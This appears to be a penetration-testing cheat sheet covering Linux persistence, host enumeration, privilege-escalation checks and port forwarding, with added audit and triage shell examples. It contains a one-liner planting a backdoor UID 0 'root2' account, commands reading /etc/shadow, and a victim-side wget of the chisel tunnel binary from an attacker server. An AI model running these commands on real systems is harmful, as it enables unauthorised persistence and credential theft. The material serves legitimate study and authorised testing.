Persistence (Maintaining Access) - Privilege Escalation
Once privileges have been escalated, the next step is to establish persistent access to the target (a backdoor, a persistence module, ...). One quick way on Linux is to append a second UID 0 account to /etc/passwd:
echo "root2:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> /etc/passwd # adds a second UID 0 account ("root2", password "toor"); a hash placed directly in field 2 of /etc/passwd is honoured, so /etc/shadow is bypassed. openssl passwd with no algorithm flag uses a version-dependent legacy default; openssl passwd -6 (SHA-512 crypt) is accepted on every modern system.
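Added example, not part of the original page: a small audit function that reports the traces the one-liner above leaves in /etc/passwd (a second UID 0 account, a password hash stored in /etc/passwd rather than /etc/shadow, an empty password field). It runs against a constructed sample file; the hash on the root2 line is a placeholder string, not a real credential.

```sh
# Added example (not from the original page): audit a passwd-format file for
# the traces that the "root2" one-liner leaves behind.
# Findings, one per line: "<account> <reason>"
#   uid0            an account other than root with UID 0
#   hash-in-passwd  a password hash stored in /etc/passwd instead of /etc/shadow
#   empty-password  an empty password field (login without a password)

audit_passwd() {
    # $1: path to a passwd-format file (7 colon-separated fields per line)
    awk -F: '
        NF != 7 { next }                                   # skip malformed lines
        $3 == 0 && $1 != "root" { print $1 " uid0" }
        $2 == "" { print $1 " empty-password"; next }
        $2 != "x" && $2 != "*" && $2 !~ /^!/ { print $1 " hash-in-passwd" }
    ' "$1"
}

# Constructed sample file for the demonstration (not a real system's passwd).
# The hash on the root2 line is a placeholder, not a working credential.
sample_passwd="$(mktemp)"
trap 'rm -f "$sample_passwd"' EXIT
cat > "$sample_passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
guest::1001:1001:Guest:/home/guest:/bin/sh
root2:$6$saltsalt$placeholderhash:0:0:root:/root:/bin/bash
EOF

audit_passwd "$sample_passwd"
# On a live system: audit_passwd /etc/passwd
```

The same three checks are what a defender's baseline monitoring should alert on: root is the only legitimate UID 0 account on a stock Linux install, and every other account's second field should be "x" (or a lock marker), never a hash.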
User information gathering
Once we have a shell on the victim, the following commands gather the basic facts about the host (users, network, processes, packages) that drive the next steps:
Linux
# DNS configuration
cat /etc/resolv.conf
# configuration file containing details about user accounts
cat /etc/passwd
# stores the hashed passphrase for Linux user account
cat /etc/shadow
whoami # Display the username associated with the current effective UID.
who -a # Display information about all connected users.
ip a # shows (IPv4 or IPv6) addresses on a device.
iptables -L # List all firewall rules (needs root).
# displays the routing table
ip r
netstat -r
# displays system information; the kernel version is the starting point for kernel exploit searches
uname -a
ps aux # running processes and the user each one runs as
# installed packages (Debian-based); quote the pattern so the shell does not expand it, "ii" marks installed packages
dpkg -l '*<pattern>*' | grep '^ii'
Windows
:: network configuration, DNS resolver cache, connections (netstat -b needs an elevated prompt) and routes
ipconfig /all
ipconfig /displaydns
netstat -bnao
netstat -r
:: hosts and domains/workgroups visible from this machine
net view
net view /domain
:: domain users (queried from a DC) and the current user's domain account, including group memberships
net user /domain
net user %username% /domain
:: password and lockout policy: check the lockout threshold before any password spraying
net accounts
:: local administrators, domain controllers and the shares exported by this host
net localgroup administrators
net group "Domain controllers" /domain
net share
Linux Privilege Escalation
sudo -l # commands the current user may run with sudo, and as which user; NOPASSWD entries and anything that can spawn a shell or write files as root are the targets
cat /etc/sudoers.d/[filename] # drop-in sudoers fragments (normally readable only by root)
netstat -ltupn # listening TCP/UDP ports with the owning PID/program
ss -tulpn # same with ss, for hosts without netstat; services bound only to 127.0.0.1 are candidates for port forwarding
cat /etc/crontab # system cron jobs; also check /etc/cron.d/, /etc/cron.*/ and /var/spool/cron/
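Added example, not from the original page: after cat /etc/crontab, the question that matters is whether any path in a root cron command is writable by the current user, or sits in a directory the user can write to (so the file can be replaced or created). The function below parses a file in /etc/crontab format (including @reboot-style lines), checks every absolute path in the command field, and is run here against a constructed crontab and scratch directory. Looking only at absolute paths and skipping /dev/ are simplifications chosen for this example.

```sh
# Added example (not from the original page): list the absolute paths in each
# cron command that the current user can write to, or could replace because the
# parent directory is writable. A root job running such a script is a direct
# privilege escalation.

cron_writable_targets() {
    # $1: file in /etc/crontab format (m h dom mon dow user command), @reboot lines included
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }   # comments, blanks, VAR=value
        {
            at    = ($1 ~ /^@/)          # @reboot, @daily, ... carry no time fields
            user  = at ? $2 : $6
            start = at ? 3  : 7
            for (i = start; i <= NF; i++)
                if ($i ~ /^\// && $i !~ /^\/dev\//) print user " " $i   # absolute paths only, skip /dev/null
        }
    ' "$1" | while read -r user path; do
        if [ -w "$path" ]; then
            echo "$user $path writable"
        elif [ -w "$(dirname "$path")" ]; then
            echo "$user $path parent-dir-writable"   # file can be replaced or created
        fi
    done
}

# Scratch directory standing in for the real filesystem (constructed for this example).
scratch="$(mktemp -d)"
trap 'chmod -R u+w "$scratch"; rm -rf "$scratch"' EXIT
mkdir -p "$scratch/tasks" "$scratch/locked"
printf '#!/bin/sh\necho backup\n' > "$scratch/tasks/backup.sh"; chmod 755 "$scratch/tasks/backup.sh"
printf '#!/bin/sh\necho job\n'    > "$scratch/locked/job.sh";   chmod 555 "$scratch/locked/job.sh"
chmod 555 "$scratch/locked"       # neither the script nor its directory is writable

# Constructed crontab (not from a real system); $scratch expands to the scratch dir.
sample_crontab="$scratch/crontab"
cat > "$sample_crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /bin/sh $scratch/tasks/backup.sh > /dev/null 2>&1
@reboot         root    $scratch/locked/job.sh
0 3     * * *   root    $scratch/tasks/cleanup.sh
EOF

cron_writable_targets "$sample_crontab"
# On a live system: cron_writable_targets /etc/crontab  (repeat for /etc/cron.d/*)
```

As an unprivileged user this reports backup.sh (owned and writable) and cleanup.sh (missing, but its directory is writable, so the file can be planted); job.sh and the system paths are silent. Run as root, every path shows as writable, which is expected and not a finding.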
FIND
find / -iname "*config*.php" 2>/dev/null # look for config files, then grep each hit for credentials: grep -i "db_" [filename]
find / -type f -user root -perm -u=s 2>/dev/null # regular files owned by root with the SUID bit set (-type f: the bit is meaningless on directories)
find / -group [name] 2>/dev/null # Find all files/dirs owned by a group
find / -user [username] 2>/dev/null # Find all files/dirs owned by a user
-perm 444 # mode is exactly 444 (r--r--r--), nothing more and nothing less
-perm /444 # any of the listed bits is set (readable by at least one of owner, group or others); use -perm -444 to require all three
-exec [command] [option] {} \; 2>/dev/null # run a command on each match: {} is replaced by the file name and the \; ends the command (note the space before it)
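Added example, not from the original page: the three forms of -perm are easy to mix up, so here they are run against files created in a scratch directory with known modes, including a file with the SUID bit set so the -u=s form used in the SUID search above can be compared with the others. The scratch directory and file names are constructed for this demonstration.

```sh
# Added example (not from the original page): the three -perm forms side by side.
#   -perm 444   mode is exactly 444
#   -perm -444  all of the given bits are set (readable by owner, group and others)
#   -perm /444  any of the given bits is set (readable by at least one of them)
# The same applies to the SUID bit: -perm -4000 (or -perm -u=s) asks "is the SUID
# bit set, whatever the other bits are", which is what the privesc search needs.

# Print the basenames of regular files under $1 matching the -perm expression $2,
# sorted and space-separated, so that results are easy to compare.
perm_matches() {
    find "$1" -type f -perm "$2" -exec basename {} \; | sort | tr '\n' ' ' | sed 's/ $//'
}

# Scratch files with known modes (constructed for this example).
scratch="$(mktemp -d)"
trap 'rm -rf "$scratch"' EXIT
for m in 444 644 400 600 755; do
    touch "$scratch/m$m"
    chmod "$m" "$scratch/m$m"
done
touch "$scratch/suid"
chmod 4755 "$scratch/suid"        # rwsr-xr-x: SUID bit plus read bits for everyone

for expr in 444 -444 /444 -4000 -u=s; do
    printf '%-6s -> %s\n' "$expr" "$(perm_matches "$scratch" "$expr")"
done
```

Expected results: -perm 444 matches only m444; -perm -444 matches m444, m644, m755 and suid (all three read bits set, other bits ignored); -perm /444 matches every file, since even m400 and m600 have the owner read bit; -perm -4000 and -perm -u=s both match only suid.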
Capabilities
getcap -r / 2>/dev/null # list file capabilities across the filesystem; cap_setuid, cap_dac_read_search, cap_sys_admin or cap_sys_ptrace on an interpreter, editor or debugger are direct routes to root without any SUID bit
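Added example, not from the original page: getcap -r / on a real host returns a long list in which most entries (ping, mtr, and so on) are harmless, so the triage step is to keep only the binaries whose capabilities are commonly enough to reach root. The function below does that for both getcap output styles, the older "/path = cap_x+ep" and the newer "/path cap_x=ep" (libcap 2.41 and later), and is run against constructed sample output. The list of risky capabilities is this editor's selection rather than an authoritative one, and the function reports a capability whatever its flags (e, p, i) are.

```sh
# Added example (not from the original page): triage "getcap -r /" output and
# print only binaries carrying capabilities that commonly lead to root.
# Usage: getcap -r / 2>/dev/null | triage_caps

triage_caps() {
    awk '
        BEGIN {
            # risky set: editor-chosen, extend to taste
            s = "cap_setuid cap_setgid cap_dac_override cap_dac_read_search"
            s = s " cap_sys_admin cap_sys_ptrace cap_sys_module cap_sys_rawio"
            s = s " cap_chown cap_fowner cap_setfcap"
            n = split(s, r, " ")
            for (i = 1; i <= n; i++) risky[r[i]] = 1
        }
        NF < 2 { next }
        {
            path = $1
            caps = $NF                        # "cap_setuid+ep" (old) or "cap_setuid=ep" (new)
            sub(/[+=][a-z]*$/, "", caps)      # strip the flag suffix: +ep, =ep, =eip
            if (caps == "") {                 # a bare "=ep" grants every capability
                print path " ALL-CAPABILITIES"
                next
            }
            m = split(caps, c, ",")           # several capabilities are comma-separated
            for (i = 1; i <= m; i++)
                if (c[i] in risky) print path " " c[i]
        }
    '
}

# Constructed sample getcap output (not from a real host), mixing both formats.
sample_getcap='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/tar cap_dac_read_search=ep
/usr/bin/gdb = cap_sys_ptrace+ep
/usr/sbin/mtr-packet cap_net_raw=ep
/opt/tool =ep'

printf '%s\n' "$sample_getcap" | triage_caps
```

On the sample this keeps python3.8 (cap_setuid: call setuid(0) from the interpreter), tar (cap_dac_read_search: read /etc/shadow or root's SSH keys), gdb (cap_sys_ptrace: inject into a root process) and /opt/tool (every capability), and drops the two cap_net_raw entries.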
GREP
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" [file] # extract IPv4-looking strings from a file or from piped output
grep -rni "somethingToLookFor" / 2>/dev/null # recursive, case-insensitive, with line numbers; on / this is slow, so prefer /etc, /var, /home or /opt
Port forwarding (chisel)
# on the attacker
cd /path/where/chisel/is # binary file
updog # or any other command to setup an http server
# on the victim
wget http://IP:PORT/chisel # fetch the binary from the attacker's HTTP server
chmod +x chisel # set it executable
# on the attacker
chisel server --reverse --port 9002 # listen for clients and allow reverse (R:) tunnels
# on the victim
./chisel client YOUR_IP:9002 R:9001:[redirectedIP]:[redirectedPort] # R:<attacker_port>:<target>:<target_port>
# Now localhost:9001 on the attacker's machine is forwarded, through the victim, to [redirectedIP]:[redirectedPort]
Using SSH
ssh -N user@[remote_IP] -L [local_bind_address]:[local_port]:[target_IP]:[target_port] # -N: open the tunnel without running a remote command
Example:
ssh -N user@10.10.10.10 -L 127.0.0.1:4441:192.168.0.100:80
Here 10.10.10.10 is the host we can SSH into as user, and 192.168.0.100:80 is a web server reachable from that host (possibly one of its own interfaces) but not from the attacker directly. The -L option binds 127.0.0.1:4441 on the attacker's machine and tunnels everything sent to it through the SSH session to 192.168.0.100:80, so http://127.0.0.1:4441 is reachable from the browser. If the browser is configured to use a proxy (for example Burp Suite listening on 172.17.0.2:4440), the tunnelled requests can be intercepted and modified in Burp Suite as needed.
Automated scripts for Linux privesc
wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh;chmod 700 lse.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh;chmod 700 les.sh # matches the kernel version (uname -a) against known public exploits
LinPEAS - Linux Privilege Escalation Awesome Script
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -Lo lPEAS.sh;chmod 700 lPEAS.sh # the repository has since been renamed PEASS-ng, so check that this URL still resolves before relying on it